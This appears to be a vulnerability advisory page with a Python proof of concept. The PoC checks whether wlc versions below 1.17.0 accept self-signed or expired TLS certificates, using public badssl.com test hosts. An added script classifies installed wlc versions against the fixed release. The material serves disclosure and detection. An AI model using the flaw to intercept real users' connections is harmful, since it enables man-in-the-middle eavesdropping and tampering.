📄 wlc SSL Certification Validation Bypass

🗓️ 20 Feb 2026 00:00:00 | Reported by indoushka | Type: packetstorm | 🔗 packetstorm.news

PoC for SSL certificate validation bypass in wlc before 1.17.0; tests invalid certs and MITM risk.

Code

    =============================================================================================================================================
    | # Title     : SSL Certificate Validation Bypass in wlc Versions Below 1.17.0                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://ubuntu.com/security/notices/USN-7981-1                                                                              |
    =============================================================================================================================================
    
    [+] Summary    : This Proof of Concept (PoC) demonstrates a security issue in wlc versions earlier than 1.17.0, where SSL/TLS certificate validation can be bypassed. 
                     By attempting connections to endpoints with invalid certificates (such as self‑signed or expired certificates), the PoC verifies whether wlc accepts the connection without proper SSL verification. 
                     Successful execution indicates that a Man‑in‑the‑Middle (MITM) attacker could intercept or manipulate communications. The PoC is intended strictly for educational and controlled testing environments.
    
    [+] POC : python poc.py
    
    #!/usr/bin/env python3
    """Check whether the installed wlc completes a request to hosts with invalid TLS certificates."""

    import shutil
    import subprocess


    def test_ssl_bypass(url):
        """Run `wlc list-projects` against url and return True if wlc exits with code 0."""
        print(f"[*] Testing URL: {url}")

        # Nothing to test if the wlc client is not installed.
        if not shutil.which("wlc"):
            print("[!] The 'wlc' tool was not found in the system path.")
            return False

        try:
            cmd = ["wlc", "--weblate-url", url, "list-projects"]
            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=10
            )

            print(f"[*] Standard Output (STDOUT): {result.stdout[:100]}...")
            print(f"[*] Standard Error (STDERR): {result.stderr[:100]}...")
            print(f"[*] Exit Code: {result.returncode}")

            # Exit code 0 is treated as "wlc accepted the connection despite the invalid certificate".
            return result.returncode == 0

        except subprocess.TimeoutExpired:
            print("[!] Connection timed out.")
            return False
        except FileNotFoundError:
            print("[!] Failed to execute 'wlc' (not found or not executable).")
            return False
        except Exception as e:
            print(f"[!] Error: {e}")
            return False


    if __name__ == "__main__":
        # Public test endpoints that present a self-signed and an expired certificate.
        test_urls = [
            "https://self-signed.badssl.com/",
            "https://expired.badssl.com/",
        ]

        print("[*] Testing for SSL Bypass vulnerability in wlc")
        print("[*] Target version: < 1.17.0")

        for url in test_urls:
            if test_ssl_bypass(url):
                print(f"[OK] SSL verification bypassed for: {url}")
                print("[!] Vulnerability confirmed: An MITM attacker could intercept the connection.")
                break
        else:
            print("[*] wlc did not complete a request to any invalid-certificate endpoint.")

    Greetings to :============================================================
    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
    ==========================================================================
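
A non-intrusive exposure check to complement the PoC above (an added example, not part of the original advisory): it classifies an installed wlc version against the 1.17.0 boundary from the title without opening any network connection. The distro-suffix handling and the sample version strings are assumptions constructed for illustration; a distribution package, such as the one covered by the USN notice linked above, can carry the fix under an older upstream number, so those versions are referred to the distribution's notice rather than flagged.

```python
import re
from importlib import metadata

FIXED = (1, 17, 0)  # first fixed upstream release, per the advisory title


def classify_wlc_version(version):
    """Return 'patched', 'vulnerable', 'check-distro-advisory' or 'unknown'."""
    # Optional Debian-style epoch, dotted numeric core, then any suffix.
    m = re.match(r"^(?:\d+:)?(\d+(?:\.\d+)*)(.*)$", version.strip())
    if not m:
        return "unknown"
    core, suffix = m.group(1), m.group(2)
    distro_suffix = suffix.startswith(("-", "+", "~"))
    # Pre-releases such as "1.17.0rc1" cannot be ordered safely here.
    if suffix and not distro_suffix:
        return "unknown"
    parts = tuple(int(p) for p in core.split("."))
    parts += (0,) * (len(FIXED) - len(parts))  # "1.17" -> (1, 17, 0)
    if parts >= FIXED:
        return "patched"
    # Assumption: a distro revision may contain a backported fix under an old
    # upstream number, so the version string alone cannot decide.
    if distro_suffix:
        return "check-distro-advisory"
    return "vulnerable"


def installed_wlc_version():
    """Version of the wlc Python distribution in this environment, or None."""
    try:
        return metadata.version("wlc")
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    # Constructed sample version strings, not taken from any advisory.
    for sample in ["1.16.1", "1.17.0", "1.13-1ubuntu0.1", "1.17.0rc1"]:
        print(f"{sample:>18}: {classify_wlc_version(sample)}")
    found = installed_wlc_version()
    if found is None:
        print("wlc is not installed in this Python environment")
    else:
        print(f"installed wlc {found}: {classify_wlc_version(found)}")
```
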

Vulners AI Score: 5.7 (Medium risk), as of 20 Feb 2026